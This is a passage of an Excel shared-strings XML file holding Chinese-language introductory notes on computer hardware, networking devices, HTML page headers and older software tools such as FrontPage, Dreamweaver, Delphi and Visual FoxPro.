        <family val="2"/>
      </rPr>
      <t>------</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将转换完的模拟信号送到显示屏。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据（data） 一旦离开CPU，必须通过 4 个步骤，最后才会到达显示屏：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GPU（类似于主板的CPU）</t>
  </si>
  <si>
    <t>显存（类似于主板的内存）</t>
  </si>
  <si>
    <t>　　显示内存的简称。顾名思义，其主要功能就是暂时将储存显示芯片要处理的数据和处理完毕的数据。图形核心的性能愈强，需要的显存也就越多。以前的显存主要是SDR的，容量也不大。市面上的显卡大部分采用的是GDDR3显存，现在最新的显卡则采用了性能更为出色的GDDR4或GDDR5显存。显存主要由传统的内存制造商提供，比如三星、现代、Kingston等。</t>
  </si>
  <si>
    <t>显卡bios（类似于主板的bios）</t>
  </si>
  <si>
    <t>　　显卡BIOS 主要用于存放显示芯片与驱动程序之间的控制程序，另外还存有显示卡的型号、规格、生产厂家及出厂时间等信息。打开计算机时，通过显示BIOS 内的一段控制程序，将这些信息反馈到屏幕上。早期显示BIOS 是固化在ROM 中的，不可以修改，而多数显示卡则采用了大容量的EPROM，即所谓的Flash BIOS，可以通过专用的程序进行改写或升级。</t>
  </si>
  <si>
    <t>显卡PCB板（类似于主板的PCB板）</t>
  </si>
  <si>
    <t>　　就是显卡的电路板，它把显卡上的其它部件连接起来。功能类似主板。</t>
  </si>
  <si>
    <t>　　全称是Graphic Processing Unit，中文翻译为“图形处理器”。NVIDIA公司在发布GeForce 256图形处理芯片时首先提出的概念。GPU使显卡减少了对CPU的依赖，并进行部分原本CPU的工作，尤其是在3D图形处理时。GPU所采用的核心技术有硬件T&amp;L（几何转换和光照处理）、立方环境材质贴图和顶点混合、纹理压缩和凹凸映射贴图、双重纹理四像素256位渲染引擎等，而硬件T&amp;L技术可以说是GPU的标志。GPU的生产主要由nVidia与ATI两家厂商生产。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显示器是属于电脑的I/O设备，即输入输出设备。它可以分为CRT、LCD等多种。它是一种将一定的电子文件通过特定的传输设备显示到屏幕上再反射到人眼的显示工具。</t>
  </si>
  <si>
    <t>显示器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘（港台称之为硬碟，英文名：Hard Disc Drive 简称HDD 全名 温彻斯特式硬盘）是电脑主要的存储媒介之一，由一个或者多个铝制或者玻璃制的碟片组成。这些碟片外覆盖有铁磁性材料。绝大多数硬盘都是固定硬盘，被永久性地密封固定在硬盘驱动器中。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主板，又叫主机板(mainboard)、系统板(systemboard)或母板(motherboard)；它安装在机箱内，是微机最基本的也是最重要的部件之一。 主板一般为矩形电路板，上面安装了组成计算机的主要电路系统，一般有BIOS芯片、I/O控制芯片、键盘和面板控制开关接口、指示灯插接件、扩充插槽、主板及插卡的直流电源供电接插件等元件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主板采用了开放式结构。主板上大都有6-8个扩展插槽，供PC机外围设备的控制卡(适配器)插接。通过更换这些插卡，可以对微机的相应子系统进行局部升级，使厂家和用户在配置机型方面有更大的灵活性。 总之，主板在整个微机系统中扮演着举足轻重的角色。可以说，主板的类型和档次决定着整个微机系统的类型和档次，主板的性能影响着整个微机系统的性能。</t>
  </si>
  <si>
    <r>
      <t>　　在电路板下面，是错落有致的电路布线；在上面，则为棱角分明的各个部件：插槽、芯片、电阻、电容等。当主机加电时，电流会在瞬间通过CPU、</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>南北桥芯片</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>内存插槽</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>、AGP插槽、</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PCI插槽</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>、IDE接口以及主板边缘的串口、并口、</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PS/2接口</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>等。随后，主板会根据BIOS（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>基本输入输出系统</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>）来识别硬件，并进入操作系统发挥出支撑系统平台工作的功能。</t>
    </r>
  </si>
  <si>
    <t>主板</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RJ-45水晶头</t>
  </si>
  <si>
    <t>双绞线</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>集线器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>交换机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>路由器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>有局域网内网络共享代理服务器、internet上的网络代理服务器；是网络信息的中转站，介于浏览器和web服务器之间；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>代理服务器：proxy，</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>防火墙</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>路由器设置图解</t>
  </si>
  <si>
    <t>HTML（HyperText Mark-up Language）即超文本标记语言或超文本链接标示语言，是目前网络上应用最为广泛的语言，也是构成网页文档的主要语言。HTML文本是由HTML命令组成的描述性文本，HTML命令可以说明文字、图形、动画、声音、表格、链接等。HTML的结构包括头部（Head）、主体（Body）两大部分，其中头部描述浏览器所需的信息，而主体则包含所要说明的具体内容。</t>
  </si>
  <si>
    <r>
      <t>HTML</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标签通常是英文词汇的全称（如块引用</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>:blockquote</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）或缩略语（如</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“p”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>代表</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Paragraph</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>），但它们的与一般文本有区别，因为它们放在单书名号里。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Frontpage </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公司出品的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>FrontPage</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是制作表单式网页的常用工具。</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>FrontPage 2000</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是微软公司最新推出的面向</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>21</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>世纪网络办公自动化时代的大型套装软件</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>0ffice 2000</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中新增的一个重要组件，也是</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>0ffice 2000</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注重网络与</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Internet</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应用的一个重要体现。</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>FrontPage 2000</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是目前最常用的中文版网页制作工具之一，简单易学。</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>FrontPage 2000</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>相对于前面的版本在网页向导、网页编辑、表单与框架页技术、音频与视频插件、动态</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HTML</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>技术（</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>DHTML</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，上世纪末兴起的一种</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>web</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>技术，现在已经过时）、数据库连接等方面进行了重大的改进，从而增强了网页制作的功能。如果服务器安装了</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Frontpage</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩展组件，还可以支持</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Frontpage</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的站点计数器等功能。它从</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2007</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>版的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Office</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开始更名为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Sharepoint Designer</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Delphi </t>
  </si>
  <si>
    <t xml:space="preserve">　　由Borland公司推出的Delphi是全新的可视化编程环境，为我们提供了一种方便、快捷的Windows应用程序开发工具。它使用了Microsoft Windows图形用户界面的许多先进特性和设计思想，采用了弹性可重复利用的完整的面向对象程序语言(Object-Oriented Language)、当今世界上最快的编辑器、最为领先的数据库技术。对于广大的程序开发人员来讲，使用Delphi开发应用软件，无疑会大大地提高编程效率，而且随着应用的深入，您将会发现编程不再是枯燥无味的工作——Delphi的每一个设计细节，都将带给您一份欣喜。 </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　　……</t>
  </si>
  <si>
    <t>　　&lt;title&gt;your title &lt;/title&gt;</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> head</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>与</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&lt;/head&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>之间必须有</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>title</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　　1、针对日文环境：</t>
  </si>
  <si>
    <t>　　&lt;!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01Transitional//EN"&gt;</t>
  </si>
  <si>
    <t>　　&lt;html lang="ja"&gt;</t>
  </si>
  <si>
    <t>　　&lt;meta http-equiv="Content-Script-Type" content="text/javascript"&gt;</t>
  </si>
  <si>
    <t>　　&lt;meta http-equiv="Content-Style-Type" content="text/css"&gt;</t>
  </si>
  <si>
    <t>　　&lt;title&gt;yourtitle&lt;/title&gt;</t>
  </si>
  <si>
    <t>　　2、针对中文环境：</t>
  </si>
  <si>
    <t>　　我们建议的编码格式是utf-8，它支持多语种，并且可以避免出现乱码的情况。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&lt;meta http-equiv="Content-Type" content="text/html; charset=</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>EUC-JP"</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&gt;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&lt;meta http-equiv="Content-Type" content="text/html; charset=</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>GB2312</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"&gt;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">HTML </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>头：</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　　&lt;head&gt;…..</t>
  </si>
  <si>
    <t>　　&lt;script type="text/javascript"&gt;</t>
  </si>
  <si>
    <t>　　&lt;!—…..--&gt;</t>
  </si>
  <si>
    <t>　　&lt;/script&gt;</t>
  </si>
  <si>
    <t>　　当然我们不希望你是这样内嵌教本，而是从一个外部文件进行引用，并且只把它放在文档的头部。</t>
  </si>
  <si>
    <t>　　&lt;script src="path/to/script.js" language="javascript" type="text/javascript"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <r>
      <t>html</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>javascript</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的书写：</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是美国</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Adobe(</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>原</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Macromedia</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2005</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>年被</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Adobe</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>收购</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公司开发的集网页制作和管理网站于一身的所见即所得网页编辑器，它是第一套针对专业网页设计师特别发展的视觉化网页开发工具，利用它可以轻而易举地制作出跨越平台限制和跨越浏览器限制的充满动感的网页。它不仅是优秀的</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>WYSIWYG</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编辑器，更是优秀的代码编辑器，有代码加亮，代码提示等丰富功能，提供各种示例代码，并支持</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Javascript,PHP,ASP,JSP</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等多种脚本语言。最新版本为</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CS4</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，发布于</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2008</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>年</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>月。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dreamweaver</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Delphi </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Excel基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作系统原理</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作系统原理</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VF</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VF</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Visual FoxPro简称VFP，是Microsoft公司推出的数据库开发软件，用它来开发数据库，既简单又方便。Visual FoxPro源于美国Fox Software公司推出的数据库产品FoxBase，在DOS上运行，与xBase系列相容。FoxPro原来是FoxBase的加强版，最高版本曾出过2.6。之后，Fox Software被微软收购，加以发展, 使其可以在 Windows 上运行, 并且更名为 Visual FoxPro。目前最新版为 Visual FoxPro 9.0，而在学校教学和教育部门考证中还依然延用经典版的 Visual FoxPro 6.0。在桌面型数据库应用中，处理速度极快，是日常工作中的得力助手。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VF</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　　</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    “所见即所得（What you see is Whatyou get）”的文字处理软件，Bravo改变了信息组织和显示的方式，这也是PARC对计算机人机交互界面发展的贡献。　　
    Bill花了10万美元购买了一台施乐的个人电脑Xerox Star，Simonyi用他来让公司里的到微软后，Simonyi领导开发的Multiplan电子表格软件十分出色，Simonyi在Mutilplan第一次创造了多级菜单(Menu)控制,这以后成为软件的工业标准。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模板是一用来作为创建其它工作簿的框架形式，利用它可以快速地创建相似的工作簿。创建模板方法为：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(1)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打开一个要作为模板的工作簿；</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(2)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>菜单中</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
